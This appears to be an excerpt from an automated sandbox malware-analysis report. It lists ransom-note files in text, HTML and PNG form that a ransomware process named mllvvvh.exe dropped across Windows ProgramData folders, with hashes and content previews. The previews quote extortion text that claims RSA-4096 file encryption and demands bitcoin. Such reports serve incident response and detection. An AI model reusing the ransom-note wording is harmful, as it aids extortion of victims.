                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Oracle\Java\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Oracle\Java\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Oracle\Java\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Oracle\Java\installcache\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Oracle\Java\installcache\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Oracle\Java\installcache\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Oracle\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Oracle\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Oracle\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
